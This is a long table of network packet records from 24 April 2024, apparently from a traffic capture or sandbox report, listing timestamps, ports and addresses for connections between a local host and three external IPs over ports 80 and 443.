Apr 24, 2024 07:32:38.691158056 CEST	80	49163	5.182.211.151	192.168.2.22
Apr 24, 2024 07:32:38.691193104 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:38.691193104 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:39.548525095 CEST	49163	80	192.168.2.22	5.182.211.151
Apr 24, 2024 07:32:39.927608013 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:39.927670002 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:39.927778959 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:39.953303099 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:39.953372002 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:40.279509068 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:40.279629946 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:40.286854029 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:40.286876917 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:40.287338018 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:40.291146040 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:40.473900080 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:40.516159058 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273226976 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273327112 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.273416042 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273489952 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.273507118 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273562908 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.273574114 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273632050 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.273667097 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273727894 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.273781061 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.273844004 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.273900032 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274020910 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274079084 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274142981 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274185896 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274241924 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274305105 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274380922 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274418116 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274492025 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274527073 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274594069 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274638891 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274697065 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274708986 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274755001 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.274801970 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:41.274859905 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.409605026 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.410864115 CEST	49164	443	192.168.2.22	172.67.19.24
Apr 24, 2024 07:32:41.410898924 CEST	443	49164	172.67.19.24	192.168.2.22
Apr 24, 2024 07:32:44.083019018 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:44.083034039 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:44.083098888 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:44.094259024 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:44.094276905 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:44.430002928 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:44.430175066 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:44.441678047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:44.441699028 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:44.442065001 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:44.582895041 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:44.628113985 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131026983 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131192923 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131289005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131392956 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.131396055 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131424904 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131447077 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.131639004 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131689072 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.131704092 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131860018 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.131915092 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.131922960 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.132452011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.132507086 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.132514954 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.132610083 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.132668018 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.132675886 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.133301020 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.133352995 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.133362055 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.133487940 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.133546114 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.133553028 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.134236097 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.134290934 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.134299040 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.134428978 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.134478092 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.134485960 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.135190010 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.135261059 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.135267973 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.135370016 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.135421038 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.135427952 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.136156082 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.136212111 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.136220932 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.136322975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.136375904 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.136384010 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.136986971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.137042999 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.137049913 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.137876987 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.137933016 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.137940884 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.138060093 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.138113976 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.138120890 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.139782906 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.139854908 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.139873981 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.139957905 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.140007973 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.140017033 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.140141964 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.140197039 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.140204906 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.140795946 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.140862942 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.140872002 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.291691065 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.291801929 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.291830063 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.292042017 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.292063951 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.292129040 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.292139053 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.292205095 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.292330980 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.292350054 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.292398930 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.293039083 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.293106079 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.293112993 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.293858051 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.293922901 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.293930054 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.295049906 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.295109034 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.295109987 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.295121908 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.295149088 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.295170069 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.295978069 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.296031952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.296039104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.296802998 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.296849966 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.296857119 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.297616005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.297671080 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.297677994 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.297842026 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.297902107 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.297909975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.299750090 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.299807072 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.299814939 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.300086021 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.300137997 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.300144911 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.301062107 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.301117897 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.301125050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.301959991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.302027941 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.302035093 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.302102089 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.302174091 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.302181959 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.303009987 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.303076982 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.303083897 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.450361967 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.450484991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.450567961 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.450568914 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.450599909 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.451719046 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.451821089 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.451829910 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.452131033 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.452184916 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.452192068 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.453130960 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.453191996 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.453200102 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.454011917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.454071045 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.454078913 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.454668045 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.454726934 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.454735041 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.454896927 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.454952002 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.454960108 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.455818892 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.455877066 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.455884933 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.456794977 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.456854105 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.456862926 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.457617044 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.457674980 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.457681894 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.458204985 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.458256006 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.458264112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.458525896 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.458595037 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.458602905 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.459345102 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.459450006 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.459458113 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.460351944 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.460407972 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.460417986 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.460587025 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.460664988 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.460673094 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.461441040 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.461513042 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.461522102 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.462196112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.462260962 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.462270021 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.462995052 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.463048935 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.463057041 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.463877916 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.463937044 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.463944912 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.464342117 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.464402914 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.464411020 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.466861010 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.466944933 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.466969013 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.466983080 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.467019081 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.469552994 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.469619989 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.469631910 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.469655037 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.469695091 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.472300053 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.472363949 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.472368956 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.472388983 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.472433090 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.474970102 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.475034952 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.475039959 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.475059986 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.475101948 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.478224039 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.478290081 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.478291035 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.478317022 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.478355885 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.481175900 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.481242895 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.481245041 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.481267929 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.481318951 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.483743906 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.483812094 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.483813047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.483836889 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.483867884 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.486443996 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.486520052 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.486557961 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.486567020 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.486579895 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.489913940 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.489974976 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.489980936 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.490009069 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.490051031 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.610212088 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.610312939 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.610553026 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.610565901 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.610586882 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.612473011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.612494946 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.612541914 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.612552881 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.612562895 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.612569094 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.612591028 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.612624884 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.612631083 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.612642050 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.615734100 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.615813017 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.615813971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.615845919 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.615864992 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.615881920 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.615904093 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.618396997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.618469000 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.618472099 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.618495941 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.618530989 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.621442080 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.621516943 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.621526003 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.621551037 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.621594906 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.624150991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.624217987 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.624222040 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.624248028 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.624285936 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.627430916 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.627497911 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.627505064 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.627531052 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.627569914 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.630392075 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.630453110 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.630461931 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.630490065 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.630530119 CEST	49165	443	192.168.2.22	172.67.215.45
